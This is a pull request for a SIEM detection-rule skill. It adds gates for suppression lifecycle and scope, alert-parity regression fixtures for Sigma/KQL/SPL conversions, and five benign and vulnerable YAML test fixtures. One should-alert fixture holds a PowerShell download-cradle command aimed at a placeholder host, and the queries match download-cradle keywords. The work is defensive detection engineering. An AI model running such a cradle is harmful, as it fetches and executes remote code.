### PR TITLE
Improve SIEM suppression fixture gates

### DIFF
--- a/skills/secops/siem-rules/SKILL.md
+++ b/skills/secops/siem-rules/SKILL.md
@@ -12,7 +12,7 @@ phase: [operate]
 frameworks: [MITRE-ATT&CK-v16]
 difficulty: intermediate
 time_estimate: "20-40min"
-version: "1.0.0"
+version: "1.0.1"
 author: unitoneai
 license: MIT
 allowed-tools: Read, Grep, Glob
@@ -57,6 +57,8 @@ Before beginning, gather or confirm:
 - [ ] **Alert priority and response:** Desired severity level and expected analyst response procedure.
 - [ ] **Performance constraints:** Query time window, maximum execution time, and scheduled frequency.
 - [ ] **Existing rules:** Any current rules covering similar detections that may overlap or conflict.
+- [ ] **Suppression inventory:** Existing exclusions, owners, tickets, expiry dates, review cadence, and blast radius.
+- [ ] **Regression fixtures:** At least one should-alert event and one should-not-alert event for new rules, tuned rules, and Sigma/SIEM conversions.
 
 ---
 
@@ -432,7 +434,7 @@ index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 LogonType=3
 2. **Statistical analysis:** Calculate mean, median, and standard deviation of the daily/hourly result count.
 3. **Threshold selection:** Set the initial threshold at mean + 2 standard deviations to capture anomalous activity while filtering normal variance.
 4. **Iterative tuning:** After deployment, review alerts weekly for the first month. Adjust the threshold based on TP/FP ratio.
-5. **Exclusion management:** Add exclusions for confirmed legitimate activity. Document each exclusion with a ticket reference and review date.
+5. **Exclusion management:** Add exclusions only for confirmed legitimate activity. Document each exclusion with exact scope, owner, ticket, expiry date, and removal/review path.
 
 **Threshold tuning parameters:**
 
@@ -456,7 +458,34 @@ Suppression:         Enabled, 1 hour
 Entity mapping:      Account -> UserPrincipalName, IP -> IPAddress, Host -> Computer
 ```
 
-### Step 5: Detection Rule Lifecycle Management
+### Step 5: Suppression and Regression Evidence Gates
+
+Suppression is a detection-control change, not a harmless noise tweak. Before accepting a tuned query, converted rule, or local exclusion, apply these gates.
+
+| Gate | Required Evidence | Flag When |
+|------|-------------------|-----------|
+| **SIEM-SUPPRESS-01: Suppression lifecycle** | Owner, ticket/change request, exact suppression condition, expiry date, and removal/review workflow. | Suppression is permanent, global, undocumented, or has no accountable owner. |
+| **SIEM-SUPPRESS-02: Bypass-resistant scope** | Scope binds to the smallest stable attributes: asset, tenant, environment, process path, signer/hash, command shape, source IP, or maintenance window. | Suppression keys only on username, hostname, broad process name, or a reusable tag an attacker can inherit. |
+| **SIEM-FIXTURE-01: Alert parity fixtures** | A should-alert event and a should-not-alert event stored with the rule, plus expected output after tuning or conversion. | Rule conversion changes field names, parser assumptions, or macros without fixtures proving alert parity. |
+
+**Suppression review questions:**
+
+1. Does the exclusion expire automatically, and will expired suppressions alert or fail review?
+2. Can an attacker obtain the same username, host, tag, process name, or query field and inherit the blind spot?
+3. Does the suppression preserve the true-positive fixture while allowing the benign fixture?
+4. Is the scope narrow enough to survive vendor parser upgrades or field normalization changes?
+
+**Fixture expectations:**
+
+| Fixture Type | Purpose | Minimum Content |
+|--------------|---------|-----------------|
+| `should-alert` | Proves the rule still catches the intended behavior. | Event fields, expected entities, and expected alert reason. |
+| `should-not-alert` | Proves benign tuning does not over-alert. | Event fields, false-positive reason, and matching suppression metadata when applicable. |
+| `field-mapping` | Protects Sigma/KQL/SPL conversions from parser drift. | Source fields, target fields, and any lookup/macro dependencies. |
+
+For converted rules, keep the source-to-target field map next to the query. If a Sigma rule used `CommandLine` but the SIEM query uses `process_command_line`, the conversion must include an event fixture that would fail if that mapping drifts.
+
+### Step 6: Detection Rule Lifecycle Management
 
 **Lifecycle stages:**
 
@@ -479,6 +508,7 @@ Entity mapping:      Account -> UserPrincipalName, IP -> IPAddress, Host -> Comp
 | Last triggered date | Within 90 days | > 180 days (rule may be stale or ineffective) |
 | Query execution time | < 30 seconds | > 2 minutes (performance issue) |
 | Exclusion count | < 10 | > 20 (rule may need fundamental redesign) |
+| Expired suppressions in production | 0 | Any expired suppression still active |
 
 **Quarterly review checklist:**
 
@@ -509,7 +539,7 @@ Produce SIEM rule deliverables in this structure:
 ```markdown
 ## SIEM Detection Rule: [Rule Name]
 **Date:** [YYYY-MM-DD]
-**Skill:** siem-rules v1.0.0
+**Skill:** siem-rules v1.0.1
 **Framework:** MITRE ATT&CK v16
 **Platform:** [Microsoft Sentinel (KQL) | Splunk (SPL)]
 
@@ -533,6 +563,16 @@ Produce SIEM rule deliverables in this structure:
 | Time window | [Xm/h] | [Why this window] |
 | Frequency | [Xm/h] | [How often to run] |
 | Suppression | [Xh] | [Cooldown period] |
+
+### Suppression and Regression Evidence
+| Evidence | Value |
+|----------|-------|
+| Suppression owner/ticket | [Owner + ticket, or "none"] |
+| Suppression expiry | [Date/time, or "none"] |
+| Suppression scope | [Host/process/user/tenant/source fields] |
+| Should-alert fixture | [Fixture name or sample event summary] |
+| Should-not-alert fixture | [Fixture name or sample event summary] |
+| Field mapping changes | [Source -> target fields for conversions] |
 
 ### Entity Mapping
 | Entity Type | Source Field |
@@ -631,6 +671,18 @@ Deploying a rule without confirming it fires on known-malicious activity is depl
 ### Pitfall 5: Failing to Suppress Duplicate Alerts
 
 A detection rule that fires every 5 minutes on the same ongoing activity (e.g., a brute force attack lasting 2 hours) floods the alert queue with duplicates. Configure alert suppression or deduplication to prevent the same incident from generating hundreds of identical alerts. Use suppression windows and entity-based grouping to consolidate related alerts.
+
+### Pitfall 6: Accepting Permanent or Global Suppressions as Tuning
+
+A suppression like "exclude this host" or "ignore this service account" may remove noise, but it also creates a reusable blind spot. Safe suppressions are narrow, justified, owner-linked, ticket-linked, and expiry-bound. If the suppression cannot be tested with both a malicious and benign fixture, treat it as a detection gap rather than a tuning win.
+
+### Pitfall 7: Suppressing on Attacker-Reusable Identity Alone
+
+Username-only, group-only, or tag-only exclusions are easy to inherit after credential theft or privilege escalation. Bind suppressions to multiple stable attributes such as tenant, asset, process signer/hash, command shape, source network, or maintenance window, and require a fixture showing malicious reuse still alerts.
+
+### Pitfall 8: Converting Rules Without Alert Parity Fixtures
+
+Sigma-to-KQL/SPL and parser migration work often fails silently when field names drift. A query can compile while matching nothing. Keep source-to-target field mappings and should-alert/should-not-alert event fixtures with each conversion so reviewers can prove that the converted rule still alerts on the intended event and ignores the intended benign case.
 
 ---
 

--- a/skills/secops/siem-rules/tests/benign/scoped-expiring-build-suppression.yaml
+++ b/skills/secops/siem-rules/tests/benign/scoped-expiring-build-suppression.yaml
@@ -1,0 +1,23 @@
+id: scoped-expiring-build-suppression
+kind: benign
+summary: Temporary build-host suppression is tied to one signed process, ticket, owner, and expiry.
+platform: microsoft-sentinel
+rule_snippet: |
+  DeviceProcessEvents
+  | where TimeGenerated > ago(1h)
+  | where FileName in~ ("powershell.exe", "pwsh.exe")
+  | where not(
+      DeviceName == "build-01" and
+      InitiatingProcessFileName == "signed-builder.exe" and
+      InitiatingProcessSigner == "Contoso Build CA" and
+      TimeGenerated < datetime(2026-07-01T00:00:00Z)
+    )
+expected_result: should_not_flag_suppression
+safe_because:
+  - suppression is scoped to one asset and one signed parent process
+  - suppression includes a ticket and named owner in rule metadata
+  - suppression expires on a concrete date
+metadata:
+  ticket: SEC-4312
+  owner: detection-engineering
+  expires_at: "2026-07-01"

--- a/skills/secops/siem-rules/tests/benign/sigma-conversion-with-regression-fixtures.yaml
+++ b/skills/secops/siem-rules/tests/benign/sigma-conversion-with-regression-fixtures.yaml
@@ -1,0 +1,26 @@
+id: sigma-conversion-with-regression-fixtures
+kind: benign
+summary: Converted rule keeps explicit field mapping and alert/non-alert fixtures.
+platform: splunk
+source_rule: suspicious-powershell-download
+field_mapping:
+  Image: process_name
+  CommandLine: process_command_line
+  User: user
+converted_query: |
+  index=edr sourcetype=process
+  (process_name="powershell.exe" OR process_name="pwsh.exe")
+  ("Invoke-WebRequest" OR "DownloadString" OR "iwr ")
+  | table _time, host, user, process_name, process_command_line
+fixtures:
+  should_alert:
+    process_name: powershell.exe
+    process_command_line: powershell.exe -NoP -c "iwr http://example.test/a.ps1"
+  should_not_alert:
+    process_name: powershell.exe
+    process_command_line: powershell.exe -Command "Get-Process"
+expected_result: should_not_flag_conversion
+safe_because:
+  - source-to-target field mapping is documented
+  - positive and benign fixtures are listed beside the converted query
+  - expected alert behavior is explicit after conversion

--- a/skills/secops/siem-rules/tests/vulnerable/permanent-global-suppression.yaml
+++ b/skills/secops/siem-rules/tests/vulnerable/permanent-global-suppression.yaml
@@ -1,0 +1,15 @@
+id: permanent-global-suppression
+kind: vulnerable
+summary: Permanent asset-only suppression hides every matching event from the host.
+platform: microsoft-sentinel
+rule_snippet: |
+  DeviceProcessEvents
+  | where TimeGenerated > ago(1h)
+  | where FileName in~ ("powershell.exe", "pwsh.exe")
+  | where DeviceName != "build-01"
+expected_result: should_flag_suppression
+missing_evidence:
+  - no expiry date or removal workflow
+  - no ticket or control owner
+  - suppresses all events from the host instead of one verified benign process
+risk: A compromised build host can run the same suspicious process family without alerting.

--- a/skills/secops/siem-rules/tests/vulnerable/sigma-conversion-field-drift-without-fixtures.yaml
+++ b/skills/secops/siem-rules/tests/vulnerable/sigma-conversion-field-drift-without-fixtures.yaml
@@ -1,0 +1,19 @@
+id: sigma-conversion-field-drift-without-fixtures
+kind: vulnerable
+summary: Sigma-to-SIEM conversion changes normalized fields without regression fixtures.
+platform: splunk
+source_rule: suspicious-powershell-download
+source_fields:
+  - Image
+  - CommandLine
+  - User
+converted_query: |
+  index=edr sourcetype=process
+  process_name="powershell.exe" command_line="*DownloadString*"
+  | table _time, host, user_name, process_name, command_line
+expected_result: should_flag_conversion
+missing_evidence:
+  - no field mapping from CommandLine to command_line
+  - no should-alert event fixture
+  - no should-not-alert event fixture
+risk: Parser or CIM field drift can silently turn the converted rule into a non-alerting query.

--- a/skills/secops/siem-rules/tests/vulnerable/username-only-suppression.yaml
+++ b/skills/secops/siem-rules/tests/vulnerable/username-only-suppression.yaml
@@ -1,0 +1,14 @@
+id: username-only-suppression
+kind: vulnerable
+summary: Username-only suppression can be reused by an attacker who compromises that account.
+platform: splunk
+rule_snippet: |
+  index=edr sourcetype=process process_name IN ("powershell.exe", "pwsh.exe")
+  | search user!="svc_build"
+  | table _time, host, user, process_name, process_command_line
+expected_result: should_flag_suppression
+missing_evidence:
+  - suppression is not bound to host, process signer, command shape, or maintenance window
+  - no expiry date
+  - no test proving malicious reuse of the account still alerts
+risk: Stolen service-account credentials inherit the same blind spot across hosts.


### PR DESCRIPTION
## Skill Improvement ($50-150 Bounty)

### Skill Modified
**Skill name:** `siem-rules`
**Skill path:** `skills/secops/siem-rules/`

### What Was Wrong
Fixes #2499.

The SIEM rule workflow already covered threshold tuning and duplicate-alert suppression, but it did not make suppression lifecycle evidence mandatory. That can let broad exclusions become permanent detection blind spots. The skill also did not require alert/non-alert regression fixtures when Sigma, KQL, SPL, or parser-field conversions change normalized field names.

### What This PR Fixes
- Bumps `siem-rules` to `v1.0.1`.
- Adds suppression inventory and regression-fixture context requirements.
- Adds `SIEM-SUPPRESS-01` and `SIEM-SUPPRESS-02` gates for owner/ticket/expiry evidence and bypass-resistant suppression scope.
- Adds `SIEM-FIXTURE-01` for should-alert/should-not-alert parity fixtures and source-to-target field mapping.
- Adds suppression and regression evidence fields to the output template.
- Adds pitfalls for permanent/global suppressions, attacker-reusable identity suppressions, and rule conversions without parity fixtures.
- Adds five fixtures covering safe scoped suppressions, safe converted-rule parity, permanent global suppression, username-only suppression, and field drift without fixtures.

### Evidence

**Before (skill misses this / false positive on this):**
```spl
index=edr sourcetype=process process_name IN ("powershell.exe", "pwsh.exe")
| search user!="svc_build"
| table _time, host, user, process_name, process_command_line
```

This can look like normal tuning, but a stolen `svc_build` account would inherit the blind spot across hosts.

**After (now correctly handled):**
```text
SIEM-SUPPRESS-01 requires owner, ticket/change request, exact suppression condition, expiry date, and review/removal workflow.
SIEM-SUPPRESS-02 requires suppression scope to bind to stable attributes such as asset, tenant, environment, process path, signer/hash, command shape, source IP, or maintenance window.
SIEM-FIXTURE-01 requires should-alert and should-not-alert fixtures plus field-mapping evidence for conversions.
```

### Test Cases Added/Updated
- [x] Added vulnerable test cases (`tests/vulnerable/`)
- [x] Added benign test cases (`tests/benign/`)
- [x] Existing validation checks pass

Added fixtures:
- `skills/secops/siem-rules/tests/benign/scoped-expiring-build-suppression.yaml`
- `skills/secops/siem-rules/tests/benign/sigma-conversion-with-regression-fixtures.yaml`
- `skills/secops/siem-rules/tests/vulnerable/permanent-global-suppression.yaml`
- `skills/secops/siem-rules/tests/vulnerable/username-only-suppression.yaml`
- `skills/secops/siem-rules/tests/vulnerable/sigma-conversion-field-drift-without-fixtures.yaml`

### Bounty Tier
- [ ] **Minor** ($50) — Doc update, small logic tweak, typo fix
- [x] **Moderate** ($100) — New edge case coverage, FP reduction with evidence
- [ ] **Substantial** ($150) — Rewritten detection logic, major coverage expansion

### Bounty Info
- [x] I have read and agree to the [CONTRIBUTING.md](../../CONTRIBUTING.md) bounty terms
- **Preferred payment method:** Can provide privately after maintainer acceptance

## Validation

- Red/green marker check: `SIEM-SUPPRESS-01`, `SIEM-SUPPRESS-02`, `SIEM-FIXTURE-01`, and `Suppression and Regression Evidence` were absent before the implementation and present after it.
- Ruby YAML parse and schema check for all five new `siem-rules` fixtures.
- Frontmatter required-field check across `skills/` and `roles/`.
- Prompt injection scan equivalent to `.github/workflows/injection-scan.yml`.
- Indexed file path existence check from `index.yaml`.
- ASCII scan for changed Markdown/YAML files.
- Added-line sensitive-pattern scan.
- `git diff --check` / `git diff --check HEAD~1..HEAD`.
- Post-push head check: local HEAD, fork branch, and GitHub PR head all match `5f5416358c1d0ee2878dfbd91ed8ddfb15e18b5d`.

/claim #2499
